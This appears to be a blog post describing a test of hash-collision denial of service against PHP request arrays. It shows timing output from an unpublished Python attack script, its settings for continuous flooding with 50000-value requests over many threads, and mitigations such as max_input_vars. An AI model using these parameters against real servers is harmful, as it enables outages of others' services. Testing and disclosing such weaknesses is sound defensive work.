Some hours ago I was reading /r/programming when I found a post about the posibility and consecuences of externally forcing colisions inside the associative arrays in PHP, it's something so... ¿overwhelming? you have to try it to see the danger it represents, let's go.

Note: The day 28 of this month took a place a_lecture which has a lot, everything! in relation with this in 28C3, it's very interesting.

The danger gets worse because a combination of factors which PHP groups:

  • The hash of an integer can be trivially guessed, the number itself.

  • There are some arrays the user can create at will: $_GET, $_POST y $_COOKIE.

Now imagine what whould happen if we launch a few malicious queries agaist a server, it can be a little tiresome to do it by hand, so there a script to do it prueba_hashmap_php.py... it's not pretty, it's not elengant, but it's not intended to either.

The script allows several posibilities, if it will or not wait for the answer from the server and how many time it will wait between query and query, this can be modified in lines lineas 10 and 11, it also can pass as parameters the number of variables to send, the number of queries to make and the number of threads to launch (in that order).

Ok, now let's get to the tests, the "attacker" is a simple netbook unable to run a mere N64 (just to give an idea), the "victim" is a Cuad Core, not the last from the market but it should perform well, shouldn't it?

Well, it doesn't

Launching a attack with a single query with 50000 elements and a single thread and waiting for the server we obtain the following data:

@TODO

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
[0] 500 > 0.192291021347 | 60.0323388577 <
----- Data -----
Codes:

500: 1 times



Average uploading time: 0.192291021347

Average downloading time: 60.0323388577

I think the problem is obvious, it took less than two tenths of a second to send the data (not counting the time to prepare the query, which is only done once) and nevertheless to the server not only it took 60 second, failing then with a 500 (Internal server error), but also in that time the a core was working at 100% of it's capacity.

And what if we repeat it with four threads?

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
[1] 500 > 0.75856590271  | 60.0828011036 <
[0] 500 > 0.740755081177 | 62.4277861118 <
[3] 500 > 0.806277036667 | 67.9619438648 <
[2] 500 > 0.784065008163 | 69.3936538696 <

----- Data -----

Codes:
500: 4 times

Average uploading time: 0.772415757179

Average downloading time: 64.9665462375

And during that time four (of four) cores are working at 100%

If someone is thinking a complex script explains this, here is the one tested:

1
2
3
<?php
   echo "Jau!";
?>

But it isn't just about a low traffic denial of service, it can get worst, what if inmediately after sending a query we disconnect and sends another one?

1
2
wait_for_server = False # Wait for the server to answer?
wait_between = 0.5 # Seconcs to wait between connections

If it's launched with blocks of 50000 values, with an infinite number of queries (-1 will do), and let's say... 10 threads, we'll se something interesting, apart from all cores going to 100% and at that first the attack takes a considerable bandwidth ~3mb (less than a minute after it only takes 1kb to maintain it), the use of memory grows, starting very fast and getting slower, but after ~10 minutes it'll consume almost 1 Gigabyte and all this while a mere netbook doesn't devote more than a 1% to the attack.

Solution

As the first referenced post says, there is already a commit in the PHP SVN which adds a max input vars directive to limit the number of parameters that can be received in one query. According to the post, it'll arrive with version 5.3.9 (in the trisquel repositories there's the 5.3.5), theoretically another option would be use the Suhosin patch, which Debian and derivates ship by default but, after trying it I cannot say it works :/

That's all, see you soon.